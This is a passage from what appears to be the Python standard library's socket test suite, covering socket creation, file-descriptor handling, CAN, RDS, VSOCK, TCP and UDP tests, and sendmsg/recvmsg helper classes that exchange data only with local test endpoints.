self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd, because on this path it doesn't actually verify the family and
# type before populating the socket object.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
fd = sock.detach()
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
self.assertEqual(s.type, unknown_type)
# some OS like macOS ignore proto
self.assertIn(s.proto, {0, 23})
@unittest.skipUnless(hasattr(os, 'sendfile'), 'test needs os.sendfile()')
def test__sendfile_use_sendfile(self):
class File:
def __init__(self, fd):
self.fd = fd
def fileno(self):
return self.fd
with socket.socket() as sock:
fd = os.open(os.curdir, os.O_RDONLY)
os.close(fd)
with self.assertRaises(socket._GiveupOnSendfile):
sock._sendfile_use_sendfile(File(fd))
with self.assertRaises(OverflowError):
sock._sendfile_use_sendfile(File(2**1000))
with self.assertRaises(TypeError):
sock._sendfile_use_sendfile(File(None))
def _test_socket_fileno(self, s, family, stype):
self.assertEqual(s.family, family)
self.assertEqual(s.type, stype)
fd = s.fileno()
s2 = socket.socket(fileno=fd)
self.addCleanup(s2.close)
# detach old fd to avoid double close
s.detach()
self.assertEqual(s2.family, family)
self.assertEqual(s2.type, stype)
self.assertEqual(s2.fileno(), fd)
def test_socket_fileno(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_STREAM)
if hasattr(socket, "SOCK_DGRAM"):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind((support.HOST, 0))
self._test_socket_fileno(s, socket.AF_INET, socket.SOCK_DGRAM)
if support.IPV6_ENABLED:
s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
self.addCleanup(s.close)
s.bind((support.HOSTv6, 0, 0, 0))
self._test_socket_fileno(s, socket.AF_INET6, socket.SOCK_STREAM)
if hasattr(socket, "AF_UNIX"):
tmpdir = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, tmpdir)
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.addCleanup(s.close)
try:
s.bind(os.path.join(tmpdir, 'socket'))
except PermissionError:
pass
else:
self._test_socket_fileno(s, socket.AF_UNIX,
socket.SOCK_STREAM)
def test_socket_fileno_rejects_float(self):
with self.assertRaisesRegex(TypeError, "integer argument expected"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=42.5)
def test_socket_fileno_rejects_other_types(self):
with self.assertRaisesRegex(TypeError, "integer is required"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno="foo")
def test_socket_fileno_rejects_invalid_socket(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-1)
@unittest.skipIf(os.name == "nt", "Windows disallows -1 only")
def test_socket_fileno_rejects_negative(self):
with self.assertRaisesRegex(ValueError, "negative file descriptor"):
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=-42)
def test_socket_fileno_requires_valid_fd(self):
WSAENOTSOCK = 10038
with self.assertRaises(OSError) as cm:
socket.socket(fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=support.make_bad_fd())
self.assertIn(cm.exception.errno, (errno.EBADF, WSAENOTSOCK))
def test_socket_fileno_requires_socket_fd(self):
with tempfile.NamedTemporaryFile() as afile:
with self.assertRaises(OSError):
socket.socket(fileno=afile.fileno())
with self.assertRaises(OSError) as cm:
socket.socket(
socket.AF_INET,
socket.SOCK_STREAM,
fileno=afile.fileno())
self.assertEqual(cm.exception.errno, errno.ENOTSOCK)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
# flags
socket.CAN_BCM_SETTIMER
socket.CAN_BCM_STARTTIMER
socket.CAN_BCM_TX_COUNTEVT
socket.CAN_BCM_TX_ANNOUNCE
socket.CAN_BCM_TX_CP_CAN_ID
socket.CAN_BCM_RX_FILTER_ID
socket.CAN_BCM_RX_CHECK_DLC
socket.CAN_BCM_RX_NO_AUTOTIMER
socket.CAN_BCM_RX_ANNOUNCE_RESUME
socket.CAN_BCM_TX_RESET_MULTI_IDX
socket.CAN_BCM_RX_RTR_FRAME
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
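# Illustrative round trip, assuming the usual can_frame_fmt of "=IB3x8s":
# build_can_frame(0x123, b'\x01\x02') packs a 16-byte frame, and
# dissect_can_frame() on that frame returns (0x123, 2, b'\x01\x02').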
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_CAN_ISOTP, 'CAN ISOTP required for this test.')
class ISOTPTest(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.interface = "vcan0"
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_ISOTP
socket.SOCK_DGRAM
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_ISOTP"),
'socket.CAN_ISOTP required for this test.')
def testCreateISOTPSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
pass
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
with self.assertRaisesRegex(OSError, 'interface name too long'):
s.bind(('x' * 1024, 1, 2))
def testBind(self):
try:
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP) as s:
addr = self.interface, 0x123, 0x456
s.bind(addr)
self.assertEqual(s.getsockname(), addr)
except OSError as e:
if e.errno == errno.ENODEV:
self.skipTest('network interface `%s` does not exist' %
self.interface)
else:
raise
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_QIPCRTR,
'QIPCRTR sockets required for this test.')
class BasicQIPCRTRTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_QIPCRTR
def testCreateSocket(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
pass
def testUnbound(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertEqual(s.getsockname()[1], 0)
def testBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
support.bind_port(s, host=s.getsockname()[0])
self.assertNotEqual(s.getsockname()[1], 0)
def testInvalidBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
self.assertRaises(OSError, support.bind_port, s, host=-2)
def testAutoBindSock(self):
with socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM) as s:
s.connect((123, 123))
self.assertNotEqual(s.getsockname()[1], 0)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
'VSOCK sockets required for this test.')
class BasicVSOCKTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_VSOCK
def testVSOCKConstants(self):
socket.SO_VM_SOCKETS_BUFFER_SIZE
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE
socket.VMADDR_CID_ANY
socket.VMADDR_PORT_ANY
socket.VMADDR_CID_HOST
socket.VM_SOCKETS_INVALID_VERSION
socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID
def testCreateSocket(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
pass
def testSocketBufferSize(self):
with socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM) as s:
orig_max = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE)
orig = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE)
orig_min = s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE, orig_max * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE, orig * 2)
s.setsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE, orig_min * 2)
self.assertEqual(orig_max * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MAX_SIZE))
self.assertEqual(orig * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_SIZE))
self.assertEqual(orig_min * 2,
s.getsockopt(socket.AF_VSOCK,
socket.SO_VM_SOCKETS_BUFFER_MIN_SIZE))
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while True:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
@unittest.skipUnless(HAVE_SOCKET_UDPLITE,
'UDPLITE sockets required for this test.')
class BasicUDPLITETest(ThreadedUDPLITESocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPLITESocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and recv() over UDPLITE
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDPLITE
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
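# Rough sketch of how the pieces are combined (the class names here are
# illustrative; the concrete combinations appear further down in this module):
#
#     class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
#         pass
#
# i.e. a generic sendmsg()/recvmsg() test class is mixed with a base class
# that supplies the actual sockets and addresses.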
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
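# For example, with the connectionless defaults ([], [], 0, serv_addr)
# defined further down, sendmsgToServer([MSG]) ends up calling
# self.cli_sock.sendmsg([MSG], [], 0, self.serv_addr).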
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
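# For example, with the datagram defaults (msg_flags_non_eor_indicator
# includes MSG_TRUNC), checkFlags(flags, eor=False) requires MSG_TRUNC to
# be set in "flags" and MSG_CTRUNC/MSG_OOB to be unset.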
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
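# recvmsg_into() returns (nbytes, ancdata, msg_flags, address), so the slice
# above rebuilds the (data, ancdata, msg_flags, address) shape produced by
# recvmsg(), letting the generic tests run unchanged against either method.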
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
